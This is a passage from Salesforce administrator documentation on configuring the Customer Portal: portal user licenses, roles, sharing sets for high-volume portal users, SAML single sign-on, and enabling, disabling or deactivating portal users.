• Portal users can run reports if they have the “Run Reports” permission.

• Portal users can export reports if they have the “Export Reports” permission.

• The Report Options section does not display on report results for portal users because portal users cannot customize
report results. Also, the Generated Chart section, which includes the Edit, Large, Medium, and Small links, does
not display on report results.
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• Report results for portal users only include links to objects the portal users have permission to access.

• Portal users can only report on objects set to Private in the organization-wide default sharing model. Some objects,
such as solutions and articles, are not included in the sharing model and cannot be reported on by Customer Portal
users.

• Portal users will receive an insufficient privileges error if they run a report that contains objects they do not have
permission to view.

• By default all users, including portal users, can view report folders. To prevent portal users from viewing report folders,
update the sharing settings on report folders to the All Internal Users group.

Custom Objects

• When you deselect the Available for Customer Portal checkbox on a custom object, the custom object is
no longer available on the Customer Portal, and all of the permissions for the custom object are automatically removed
from portal profiles. If you select the Available for Customer Portal checkbox on a custom object again,
you must update the permissions for the custom object on portal profiles.

Note:  If you configure custom object access at a later time, permission sets retain their configuration.

• Portal users can view, search, and create notes and attachments on custom objects.

• If Chatter is enabled for your organization, feed attachments are included in the Notes and Attachments related list.
Portal users can download feed attachments, but can’t preview, edit, or delete them.

Articles

For setup information, see Enabling Salesforce Knowledge in the Customer Portal on page 1953.

Assets

• Portal users can create, view, and update assets associated with their accounts.

• Assets are only visible to portal users if you include the Assets lookup field on case page layouts. From case detail
pages, portal users can view an asset by clicking it in the Asset field.

• Portal users can view and search attachments on assets.

• If Chatter is enabled for your organization, feed attachments are included in the Notes and Attachments related list.
Portal users can download feed attachments, but can’t preview, edit, or delete them.

Salesforce CRM Content

• Portal users with a Salesforce CRM Content feature license can perform any tasks granted by their library permission.

• Portal users with the “View Content on Portals” user permission have view-only access to Salesforce CRM Content.

• Portal users with the “Create Libraries” user permission can create and administer libraries.

For more information, see Enabling Salesforce CRM Content in the Customer Portal on page 1949.

Answers

For setup information, see Enabling Answers in the Customer Portal on page 1954. When customizing your portal fonts
and colors, note that answers only supports the following changes:
• All tab styles

• The following page styles:
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◊ Page Background

◊ Text

◊ Link

◊ Link Hover

Ideas

For setup information, see Enabling Ideas in the Customer Portal on page 1951.

Accounts

Only users with delegated external user administrator rights can view the Accounts tab and their account's detail page
in your Customer Portal. See Delegating Customer Portal User Administration and Portal Super User on page 1985.

Contacts

Only users with delegated external user administration rights can view their account's contacts. See Delegating Customer
Portal User Administration and Portal Super User on page 1985.

Only users with the “Portal Super User” permission can view the Contacts tab and edit and detail pages for contacts in
your Customer Portal. See Delegating Customer Portal User Administration and Portal Super User on page 1985.

Entitlements

• For set up information, see Enabling Entitlement Management in the Customer Portal on page 1952.

• Add the “Read” permission on entitlements to custom portal profiles; assign the profiles to portal users who need
access to entitlements. See Configuring User Access to the Customer Portal on page 1975.

• Add the Entitlement Name lookup field to case page layouts so that portal users can add entitlements to cases.

• Don't add the following entitlement process fields to case page layouts for portal users because portal users shouldn't
access information related to your internal support processes: Entitlement Process Start Time, Entitlement
Process End Time, Stopped, and Stopped Since. See Case Fields on page 1672.

• Optionally, add the Entitlements tab to your Customer Portal so that portal users can view entitlements associated
with their accounts and create cases from entitlements.

• Add the Entitlements related list to account and contact page layouts so that delegated external user administrators
can create cases automatically associated with the right entitlements. See Delegating Customer Portal User
Administration and Portal Super User on page 1985.

Service Contracts

• For set up information, see Enabling Entitlement Management in the Customer Portal on page 1952.

• Grant the “Read” permission on service contracts to the portal users who need access to service contracts. See
Configuring User Access to the Customer Portal on page 1975.

• Add the Service Contracts tab to your Customer Portal so that portal users can view the details of their service
contracts. See Customizing Your Customer Portal Tabs on page 1947.

• Contract line items don't display in the Customer Portal.

Flows

• You can include Force.com flows in your Customer Portal by embedding them in a Visualforce page.
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• Users can only run flows that have an active version. If the flow you embed doesn't have an active version, users see
an error message. If the flow you embed includes a subflow element, the flow that is referenced and called by the
subflow element must have an active version.

• When making a flow available to site or portal users, be sure to point them to the URL of the Visualforce page that
contains the embedded flow, not to the URL of the flow itself. Site and portal users don’t have the privileges to run
flows directly.

See Also:
Customizing Your Customer Portal Pages

Customer Portal Setup Limits

Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

Contact salesforce.com for information about the number of Customer Portals and Customer Portal user licenses you can
activate.

The maximum number of custom objects you can include in a Customer Portal is determined by the total number of custom
objects your Edition allows.

Also, user licenses control the number of custom objects a portal user can see in a Customer Portal. For information, contact
salesforce.com.

See Also:
Setting Up Your Customer Portal
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Enabling Single Sign-On for Portals

Customer Portal is available in: Enterprise, Unlimited, and Developer Editions

Partner Portal is available in: Enterprise and Unlimited Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Modify All Data”

To edit the settings:

Single sign-on is a process that allows network users to access all authorized network resources without having to log in
separately to each resource. Single sign-on allows you to validate usernames and passwords against your corporate user database
or other client application rather than having separate user passwords managed by Salesforce.

You can set up Customer Portals and partner portals to use SAML single sign-on, so that a customer only has to login once.

Note:  Single sign-on with portals is only supported for SAML 2.0.

To enable single sign-on for portals:

1. In addition to the SAML sign-on information that must be gathered and shared with your identity provider, you must
supply your information provider with the Organization ID and the Portal ID. In the SAML assertion that is sent from
your identity provider, the portal_id and organization_id must be added as attributes.

Note:  You can leave these attributes blank to differentiate between portal and platform users. For example, when
blank, the user is a regular platform user and when populated, the user is a portal user.

a. From Setup, click Company Profile > Company Information and copy the ID located in the Salesforce
Organization ID.

b. For Customer Portals, from Setup, click Customize > Customer Portal > Settings, click the name of the Customer
Portal, and copy the ID located in the Portal ID.

c. For partner portals, from Setup, click Customize > Partners > Settings, click the name of the partner portal, and copy
the ID located in the salesforce.com Portal ID.

See Also:
Setting Up Your Customer Portal
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CUSTOMER PORTAL USERS

About Customer Portal User Management
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Self-Service Users”To manage Customer Portal users:

“Manage Users”To manage profiles and permission sets:

“Customize Application”To create, edit, and delete page layouts:

“Customize Application”To set field-level security:

“Manage Users”To set sharing rules:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

Managing Customer Portal users is similar to managing regular Salesforce users. General user administration concepts like
profiles and page layouts still apply. Review the following advice for managing Customer Portal users:

• Customer Portal Profiles

• Customer Portal Sharing Rules

• Customer Portal Role Hierarchy

• Customer Portal User Licenses

Note: High-volume portal users (Service Cloud portal users) include both the High Volume Customer Portal and
Authenticated Website license types.

Customer Portal Profiles

The profiles you assign to Customer Portal users define permissions for them to perform different functions within a Customer
Portal, such as whether they can view, create, edit, or delete cases and custom object records.

When you enable a Customer Portal, the following profiles are automatically created if you purchased user licenses for them:

• High Volume Customer Portal
• Authenticated Website
• Customer Portal User
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• Customer Portal Manager

The settings on Customer Portal profiles are similar. However, you can grant users with the Customer Portal Manager profile
greater access to data via the Customer Portal role hierarchy and sharing rules (neither of which apply to high-volume portal
users). You can also clone and customize each profile to suit the various support requirements of specific customers. You can
also use permission sets to grant additional permissions and access settings to Customer Portal users.

Depending on the user licenses you purchased, you can configure Customer Portal profiles for custom objects, Salesforce
CRM Content, reporting, and customer support functionality, such as cases and solutions.

Customer Portal Sharing Rules

After you enable a Customer Portal, the following groups and sharing rule category are created:

DescriptionGroups and Sharing Rule
Category

Contains all Customer Portal users, except for high-volume portal users.All Customer Portal Users
group

Contains all Salesforce users in your organization.All Internal Users group

Lets you create sharing rules with specific Salesforce users in your organization by role plus
all of the users in roles below that role, excluding any Customer Portal and partner portal
roles.

Because high-volume portal users don’t have roles, they aren’t included in this or any other
sharing rule category.

Roles and Internal
Subordinates sharing rule
category

You can use these groups and the sharing rule category to create sharing rules that:

• Grant Customer Portal or Salesforce users access to specific data (except for high-volume portal users, because you can’t
include them in any groups or sharing rules)

• Link Customer Portal users and Salesforce users
• Link Customer Portal users from different accounts as long as they have the Customer Portal Manager user license

Customer Portal Role Hierarchy

When you enable a Customer Portal on an account, the system creates a role hierarchy for the account’s portal users. The
portal roles are unique for each account and include the account’s name—or example, “Account A Customer User.” In your
organization’s overall role hierarchy, this account-specific hierarchy is directly below the account owner.

The roles in a portal role hierarchy are fixed. You cannot customize them or add new ones. They are:

• Executive—for contacts
• Manager—for contacts
• User—for contacts
• Person Account—for person accounts

Note:  All users in a customer portal role (Executive, Manager, and User roles) have read access to all portal-enabled
contacts under their portal account even when the contact sharing model is private.

As you enable customers as Customer Portal users, the system automatically assigns roles based on the user license. Person
accounts always have the Person Account role. Contacts with the High Volume Customer Portal or Authenticated Website
license do not have a role.
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If access to contacts are set to private, high-volume portal users only have access to their own contact and those they are granted
access to.

Role hierarchies ensure that portal users from different accounts never see each other’s data. Even though high-volume portal
users aren’t included in role hierarchies, they’re restricted from seeing records that aren’t associated with their account or
contact, and they can only see objects to which they’ve been granted access. You can, however, create sharing rules so that
users with the Customer Portal Manager license from different accounts can see each other’s data.

Accounts with different portal types—Customer Portal and partner portal—have a separate role hierarchy for each portal.
Role names include the portal type with which they are associated. For example, if Account A has both a Customer Portal
and a partner portal, then roles for the Customer Portal are named “Account A Customer User” and roles for the partner
portal are named “Account A Partner User.”

To view the roles assigned to your Customer Portal users, create a custom report, choose Administrative Reports, select Users
as the data type, and add Role to your report columns. Note that you can’t report on roles for high-volume portal users because
they don’t have roles.

Note:  You cannot create a Customer Portal user associated with an account owned by a partner user.

Customer Portal User Licenses

A user license entitles a user to different functionality within Salesforce and determines which profiles and permission sets are
available to the user.

You can assign the following user licenses to Customer Portal users:

• High Volume Customer Portal
• Authenticated Website
• Customer Portal Manager Custom
• Customer Portal Manager Standard (not available for new customers)

These user licenses determine the available Customer Portal profiles. They also determine users’ positions in the Customer
Portal role hierarchy.

The following table shows the Customer Portal user licenses with their associated profiles and positions in the Customer
Portal role hierarchy.

Roles and SharingProfilesUser License

High-volume portal users don’t have roles. See About
High-Volume Portal Users (Service Cloud Portal Users)
on page 1969.

Can’t share but can transfer records they own.

High Volume Customer Portal
or Authenticated Website
profile, or a profile cloned and
customized from one of these.

High Volume Customer Portal
(Service Cloud Portal )

and

Authenticated Website
Can’t transfer cases from non-high-volume portal users
to them.Both user licenses are

high-volume portal users
Can’t include in:(Available to purchase)
• Personal groups or public groups.
• Sharing rules.
• Account teams, opportunity teams, or case teams.
• Salesforce CRM Content libraries.
• High-volume portal users can’t access standard

Account and Contact detail pages. However, you can
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Roles and SharingProfilesUser License

create a custom solution, using tools like Visualforce
or the API, where they can access those records.

Can access custom objects depending on profile settings.

Can assign to either the Executive, Manager, or User role.

Can view and edit data they directly own or data owned
by or shared with users below them in the Customer

Customer Portal Manager
profile or a profile cloned and
customized from the Customer
Portal Manager profile.

Customer Portal Manager
Custom

(Available to purchase)
Portal role hierarchy; and they can view and edit cases
where they are listed in the Contact Name field.

Can have data shared to them just like other Salesforce
users.

• Can access custom objects depending on profile
settings.

• Can access reports depending on profile settings.
• Can access Salesforce CRM Content depending on

feature license and profile settings. See Enabling
Salesforce CRM Content in the Customer Portal on
page 1949.

• Can receive the “Portal Super User” and “Delegated
External User Administrator” permissions.

Can only assign to either the Executive, Manager, or User
role.

Can view and edit data they directly own or data owned
by or shared with users below them in the Customer

Customer Portal User profile or
a profile cloned and customized
from the Customer Portal User
profile.

Customer Portal Manager
Standard

Portal role hierarchy; and they can view and edit cases
where they are listed in the Contact Name field.

Can have data shared to them just like other Salesforce
users.

• Can access custom objects depending on profile
settings.

• Can receive the “Portal Super User” permission.
• Can access Salesforce CRM Content depending on

feature license and profile settings. See Enabling
Salesforce CRM Content in the Customer Portal on
page 1949.

Note:  This license is not available for new
customers.

Note: Person accounts enabled as Customer Portal users are automatically assigned the Person Account role, which
you cannot change. Person accounts are automatically assigned to this role because they include a single user, so
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multiple roles are not necessary for their account. Furthermore, all person accounts owned by the same user are
assigned the same role.

See Also:
Setting Up Your Customer Portal
Delegating Customer Portal User Administration and Portal Super User
Administrator setup guide: Salesforce Customer Portal Implementation Guide

About High-Volume Portal Users (Service Cloud Portal
Users)

Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

High-volume portal users (Service Cloud portal users) are limited-access portal users intended for organizations with many
thousands to millions of portal users. Unlike other portal users, high-volume portal users don’t have roles, which eliminates
performance issues associated with role hierarchy calculations. High-volume portal users include both the High Volume
Customer Portal and Authenticated Website license types.

Characteristics

High-volume portal users:

• Are contacts enabled to access a Customer Portal.
• Are assigned to the High Volume Customer Portal or Authenticated Website license.
• Only share the records they own with Salesforce users in the high-volume portal users sharing group.

Access to Records

High-volume portal users can access records if any of the following conditions are met:

• They have “Update” access on the account they belong to.
• They own the record.
• They can access a record’s parent, and the organization-wide sharing setting for that record is Controlled by Parent.
• The organization-wide sharing setting for the object is Public Read Only or Public Read/Write.
• They access the account or contact that they’re enabled under via the API (not via the standard account or contact detail

page).

Administrators can create sharing sets to grant high-volume portal users additional access to records; see Granting High-Volume
Portal Users (Service Cloud Portal Users) Access to Records on page 1970.
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Limitations

• High-volume portal users can’t manually share records they own or have access to.
• You can’t transfer cases from non-high-volume portal users to high-volume portal users.
• High-volume portal users can’t own accounts.
• You can’t add case teams to cases owned by high-volume portal users.
• You can’t include high-volume portal users in:

◊ Personal groups or public groups.
◊ Sharing rules.
◊ Account teams, opportunity teams, or case teams.
◊ Salesforce CRM Content libraries.
◊ High-volume portal users can’t access standard Account and Contact detail pages. However, you can create a custom

solution, using tools like Visualforce or the API, where they can access those records.

These limitations also apply to records owned by high-volume portal users.
• You can’t assign high-volume portal users to territories.

See Also:
Sharing Records Owned by High-Volume Portal Users (Service Cloud Portal Users) to Salesforce Users
Granting High-Volume Portal Users (Service Cloud Portal Users) Access to Records

Granting High-Volume Portal Users (Service Cloud Portal
Users) Access to Records

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To grant high-volume portal users access to records:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can create sharing sets to grant high-volume portal users (Service Cloud portal users) access to records based on their
profiles. A sharing set allows high-volume portal users to access any record that has a lookup field to an account or contact
that matches the user’s account or contact.

1. From Setup, click Customize > Customer Portal > Settings.
2. In the Sharing Settings for High-Volume Portal Users related list, click New to create a sharing set, or click Edit next to

an existing sharing set.
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3. In the Sharing Set Edit page, enter a name and description.
4. Select the profiles of the users you want to have access.
5. Select the objects you want to grant access to.

The Available Objects list excludes:

• Objects with an organization-wide sharing setting of Public Read/Write
• Custom objects that aren’t specified as available for Customer Portal
• Custom objects that don’t have an account or contact lookup field

6. In the Configure Access section, click Set Up or Edit next to an object name to configure access for the selected profiles,
or click Del to remove access settings for an object.

Note:  Objects with Set Up in the Action column aren’t configured for high-volume portal user access. Until you
configure an object, high-volume portal users have limited or no access to its records. For more information on
access, see About High-Volume Portal Users (Service Cloud Portal Users) on page 1969.

7. Grant access based on an account or contact lookup:

• Select All records where the high-volume portal user’s account matches to give high-volume
portal users access to all records associated with their accounts. For example, choosing this option for cases would give
users access to all cases associated with their accounts.

• Select Only records where the high-volume portal user’s contact matches to give high-volume
portal users access only to the records that are associated with their contacts. For example, choosing this option for
cases would give users access only to the cases that they filed, or cases that were filed on their behalf by a support
representative.

Note:  One of these options may be unavailable if the object doesn’t contain the relevant fields.

8. Choose an access level of Read Only or Read/Write. (If the object’s organization-wide sharing setting is Public Read Only,
then only Read/Write is available.)

9. Click Update, then click Save.

Your settings apply to all of your organization’s Customer Portals or sites.

See Also:
About High-Volume Portal Users (Service Cloud Portal Users)
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Granting High-Volume Portal Users (Service Cloud Portal
Users) Access to User Records

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To grant high-volume portal users access to records:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can create a sharing set on the User object to grant high-volume portal users (Service Cloud portal users) access to other
users in the same portal account, enabling them to see or edit each other’s user records.

To create a sharing set for the User object:

1. From Setup, click Customize > Customer Portal > Settings.
2. In the Sharing Settings for High-Volume Portal Users related list, click New to create a sharing set, or click Edit next to

an existing sharing set.
3. On the Sharing Set Edit page, enter a name and description.
4. Select the profiles of the users you want to have access.
5. Select the User object.
6. In the Configure Access section, click Set Up or Edit next to the User object to configure access for the selected profiles,

or click Del to remove access settings for an object.
7. Select All records where the high-volume portal user’s account matches and then select Account

from the menu to give high-volume portal users access to all user records associated with their accounts.
8. Choose an access level of Read Only or Read/Write. (If the User object’s organization-wide sharing setting is Public

Read Only, then only Read/Write is available.)
9. Click Update, then click Save.

Your settings apply to all of your organization’s Customer Portals or sites.

See Also:
Controlling Who Community or Portal Users Can See
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Sharing Records Owned by High-Volume Portal Users
(Service Cloud Portal Users) to Salesforce Users

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To share records owned by high-volume portal users to
Salesforce users:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

High-volume portal users (Service Cloud portal users) are limited-access portal users intended for organizations with many
thousands to millions of portal users. Unlike other portal users, high-volume portal users don’t have roles, which eliminates
performance issues associated with role hierarchy calculations. Because high-volume portal users are not in the role hierarchy
while Salesforce users are, a share group allows you to specify the Salesforce users who can access records owned by high-volume
portal users. Each Customer Portal has its own share group.

To specify the Salesforce users who can access records owned by high-volume portal users:

1. From Setup, click Customize > Customer Portal > Settings.
2. Click the name of a Customer Portal.
3. Click the Share Group Settings subtab.
4. Click Activate to turn on the share group.

Activating the share group can take a while. An email is sent to you when the process finishes.

Note:  Deactivating a share group removes all Salesforce users’ access to records owned by high-volume portal
users. An email isn’t sent to you when the deactivation process finishes.

5. Click Edit to add Salesforce users to the share group:

a. From the Search drop-down list, select the type of member to add.
b. If you don’t see the member you want to add, enter keywords in the search box and click Find.
c. Select members from the Available Members box, and click Add to add them to the group.
d. Click Save.

See Also:
About High-Volume Portal Users (Service Cloud Portal Users)
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Viewing Sharing Sets for High-Volume Portal Users (Service
Cloud Portal Users)

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To grant high-volume portal users access to records:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

Administrators can create sharing sets to grant high-volume portal users (Service Cloud portal users) access to objects based
on their profiles. To view detailed information about a sharing set:

1. From Setup, click Customize > Customer Portal > Settings.
2. In the Sharing Settings for High-Volume Portal Users related list, click the name of a sharing set.

The Sharing Set detail page shows the profiles included and the access granted to objects in the set. On this page, you can do
any of the following:

• To edit the sharing set, click Edit.
• To remove the sharing set, click Delete.

• To view the details of an included profile, click its name.

• To change or remove access settings for an object, click the Edit or Del link next to the object name.

See Also:
About High-Volume Portal Users (Service Cloud Portal Users)
Granting High-Volume Portal Users (Service Cloud Portal Users) Access to Records
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CUSTOMER PORTAL ACCESS

Configuring User Access to the Customer Portal
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up the Customer Portal:

“Edit Self-Service Users”To manage Customer Portal users:

“Manage Users”To create, edit, and delete profiles:

“Manage Users”To set default sharing access:

“Manage Users”To set sharing rules:

“Edit Self-Service Users”

OR

“Manage Users”

To enable Customer Portal users:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

When setting up a Salesforce Customer Portal for the first time, configure the following before enabling users to access your
portal:

1. Set up your portal as described in Setting Up Your Customer Portal.
2. Assign Customer Portal profiles to a portal:

a. Select the name of a portal from the Customer Portal Setup page.
b. Click Edit Profiles in the Assigned Profiles section.
c. Select the Active checkbox next to the profile you want to assign to the portal.

Portal users can only log into Customer Portals assigned to their profile. If you are creating multiple portals, you must
assign profiles to each portal you want users to access.

3. Set the organization-wide defaults in your organization’s sharing model to Private on accounts, contacts, contracts, assets,
and cases. This ensures that portal users can only view and edit data related to their accounts.
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Tip:  To maintain Public organization-wide default behavior for Salesforce users, while ensuring that portal users
can only view and edit data related to their accounts, you can create self-referencing sharing rules of “All Internal
Users” to “All Internal Users”.

4. Optionally, set sharing rules for portal users (with the exception of high-volume portal users). This lets you share records
between portal users and Salesforce users or vice-versa.

Note:  If your organization uses sharing rules that share to Roles, Internal and Portal Subordinates, then update
those sharing rules to share to Roles and Internal Subordinates instead. This is to help ensure that no records
owned by a Salesforce user are accidentally shared with a portal user.

The Roles and Internal Subordinates data set category allows you to create sharing rules that include all users in
a specified role plus all of the users in roles below that role, excluding any Customer Portal and partner portal
roles.

You can easily convert sharing rules that include Roles, Internal and Portal Subordinates to include Roles and
Internal Subordinates instead by using the Convert Portal User Access wizard. Furthermore, you can use this
wizard to convert any publicly accessible report, dashboard, and document folders to folders that are accessible by
all users except for portal users.

5. Verify that portal users are not added to any queues and are not included in any public groups added to queues. This is
because portal users added to queues may be able to access records from accounts to which they are not related.

6. Optionally, add the Welcome component to home page layouts assigned to portal users.

The Welcome component allows portal users to receive a welcome message with their name, plus the ability to change
their own portal username, password, locale, language, time zone, and contact information. For details, see Setup Tips
and Considerations for Customer Portal Pages on page 1958.

7. Optionally, allow contacts to register themselves for access to your portal. See Enabling Customer Portal Login and Settings
on page 1937.

See Also:
About Customer Portal User Management
Administrator setup guide: Salesforce Customer Portal Implementation Guide
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Enabling the Customer Portal for Contacts and Person
Accounts

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on the account associated with the Customer Portal
user

AND

“Edit Self-Service Users”

To enable Customer Portal users, or to log in as a portal user:

To allow a customer to access your Salesforce Customer Portal, you must enable the customer’s contact or person account
record as a Customer Portal user. You can either disable or deactivate Customer Portal users at any time.

To enable the Customer Portal for a customer:

1. Click Manage External User and choose Enable Customer User from the drop-down button on the contact or person
account detail page.

2. Verify the general information and locale settings, and enter any missing information. Note that the customer’s Username
defaults to his or her Email.

3. Select a portal user license. The user license you choose determines the permission sets, user profile, and role hierarchy
options you can select for the Customer Portal user. See Customer Portal User Licenses on page 1967.

4. Select Generate new password and notify user immediately to email a Customer Portal username and
password to the customer.

If your organization uses multiple Customer Portals, a portal user can access all the Customer Portals assigned to his or
her profile with one username and password. See Creating Multiple Customer Portals on page 1935.

5. Click Save.

To troubleshoot or confirm the portal configuration, on the contact detail page, click Manage External User and choose Log
in to Portal as User. This opens a new browser window and logs you into the portal as the partner user.

Tips on Enabling the Customer Portal for Contacts

Consider the following when enabling the Customer Portal for contacts:

• To view or edit an enabled contact’s access to your Customer Portal, on the contact detail page, click Manage External
User and choose View Customer User.

• You cannot enable the contact for the Customer Portal unless the owner of the contact’s account is associated with a role
in your organization.

• The first time you enable a contact for the Customer Portal on an account, you cannot assign the contact to a portal role.
The contact is automatically assigned to the Customer User role, which includes the name of the contact’s account. You
can update contact’s portal role later.

This behavior doesn’t apply to high-volume portal users because they don’t have roles and aren’t included in the role
hierarchy.
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• A contact can be either a partner or Customer Portal user, but not both. If a user is a partner user and a Customer Portal
user, then you need to create two contact records for the user so that he or she can have a separate username and password
for each portal.

However, a contact can be a Self-Service user as well as a partner or Customer Portal user. Any data created or owned by
a Self-Service user can be visible to a partner or Customer Portal user associated with the same contact.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

• You cannot delete an active Customer Portal user; you can only disable or deactivate his or her access to the Customer
Portal.

The following table describes whether you can delete contacts that are associated with portal users:

Can You Delete the Contact?State of Portal User Associated to Contact

No. This is to ensure that the contact is available if you
choose to reactivate the portal user.

Active portal user

No. This is to ensure that the contact is available if you
choose to reactivate the portal user.

Inactive portal user

Yes. Deleted contacts are sent to the Recycle Bin.Disabled portal user

• You can change the account on the contact at any time.
• You can merge contacts enabled to use a Customer Portal.
• The user’s Nickname defaults to his or her email alias unless you specify otherwise. For example, if the user’s Email is

“jsmith@company.com,” the user’s Nickname defaults to “jsmith” when you click Save.
• Delegated administrators can’t assign the High Volume Customer Portal license to contacts.

Tips on Enabling the Customer Portal for Person Accounts

Consider the following when enabling the Customer Portal for person accounts:

• After the person account is enabled, click Manage External User and choose View Customer User on the person account
detail page to view or edit a person account’s access to your Customer Portal.

• You can’t delete a person account enabled to use a Customer Portal.
• You can’t import person accounts to be automatically enabled to use a Customer Portal. For more information on importing

person accounts, see Import My Person Accounts on page 468.
• Person account users can’t self-register for a Customer Portal. When they try to do so, they receive an email notification

that instructs them to contact the portal administrator. See Enabling Customer Portal Login and Settings on page 1943.
• You can't merge person accounts enabled to use a Customer Portal.

See Also:
Social Accounts, Contacts, and Leads Overview
About Customer Portal User Management
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Roles Per Customer Portal Account
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set the number of roles per portal account:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

You can set the default number of roles for Customer Portal accounts. This benefits your customer portal by reducing the
number of unused roles for Customer Portal accounts. You must have a Customer Portal enabled to use this functionality.

For example, if you currently have three roles created when an account is enabled for your Customer Portal, but only need
one role for new accounts, you can reduce the number of roles to one. You can set up to three roles for Customer Portal
accounts. The default number of roles for Customer Portal accounts is three.

To set the number of roles per Customer Portal account:

1. From Setup, click Customize > Customer Portal > Settings.
2. Click Set number of roles per Portal Account.
3. Click Edit.
4. In the Number of Roles drop-down list, set your default number of roles per Customer Portal account.
5. Click Save.

The number of roles for existing portal accounts doesn't change with this setting.

See Also:
Enabling the Customer Portal for Contacts and Person Accounts
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Disabling and Deactivating Portal Users
Customer Portal is available in: Enterprise, Unlimited, and Developer Editions

Partner Portal is available in: Enterprise and Unlimited Editions

User Permissions Needed

“Edit” on the account associated with the Customer Portal
user

AND

“Edit Self-Service Users”

To disable or deactivate Customer Portal users:

“Edit” on the account associated with the partner portal user

AND

“Manage External Users”

To disable or deactivate partner portal users:

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

There are two ways in which you can remove a customer’s access to your Salesforce Customer Portal or partner portal. As
described in detail below, disabling a portal user is permanent, while deactivating a portal user is not:

Disabling a portal user

Disabling a portal user includes the following actions:
• Termination of the user’s access to your portal

• Removal from all groups, teams, and sharing rules with which the user is associated.

• Permanent loss of the portal user’s association with the contact

If you later re-enable a contact for portal access, a new portal user is created that is not related to the previous portal
user record in any way.

• For partner users, the partner user role becomes obsolete. As a result:

◊ The user’s data no longer rolls up to the partner account owner role

◊ Opportunities owned by that user are removed from your organization’s forecast hierarchy

Note:  Before disabling a partner user, we recommend transferring opportunities owned by that user to
an active user.

1980

Disabling and Deactivating Portal UsersSetting Up Customer Channels



We recommend disabling a portal user if:
• A contact was accidentally enabled as a portal user

• The portal user is associated with a duplicate contact

• You do not want a contact to access the portal in the future

Note:

Salesforce doesn’t delete user records, including portal user records. While you can’t re-enable a disabled portal
user, you can view and update the record for a disabled user in Setup by clicking Manage Users > Users.

Deactivating a portal user

Deactivating a portal user prevents that user from logging into your portal and gives you the option to remove the user
from any teams in which he or she is a member (for example, case teams and account teams). When you deactivate a
portal user, the portal user record does not permanently lose its association with the contact. You can reactivate the portal
user at any time.

Note: When a delegated external user administrator deactivates a portal user, the administrator doesn't have
the option to remove the portal user from any teams that user is a member of.

We recommend deactivating a portal user if you may reactivate the portal user in the future.

If a user on an account team has Read/Write access (Account Access, Contact Access, Opportunity Access, and Case
Access) and is deactivated, the access will default to Read Only if the user is reactivated.

Disabling a Portal User

To disable a portal user:

1. On the contact detail page, click Manage External User and choose either Disable Customer User or Disable Partner
User. On the account detail page of a person account, click Manage External Account and choose Disable Customer
Account.

Person accounts are not available for the partner portal.

2. Click OK.

Deactivating a Portal User

To deactivate a portal user:

1. For the Customer Portal, click Manage External User and choose View Customer User on the contact or person account
detail page. For the partner portal, click Manage External User and choose View Partner User on the contact detail page.

Person accounts are not available for the partner portal.

2. Click Edit, and deselect the Active checkbox.

To reactivate a portal user at any time, select the Active checkbox.

3. Click Save.

Tips on Disabling and Deactivating Portal Users

Consider the following when disabling or deactivating portal users (disabling is permanent; deactivating is not):
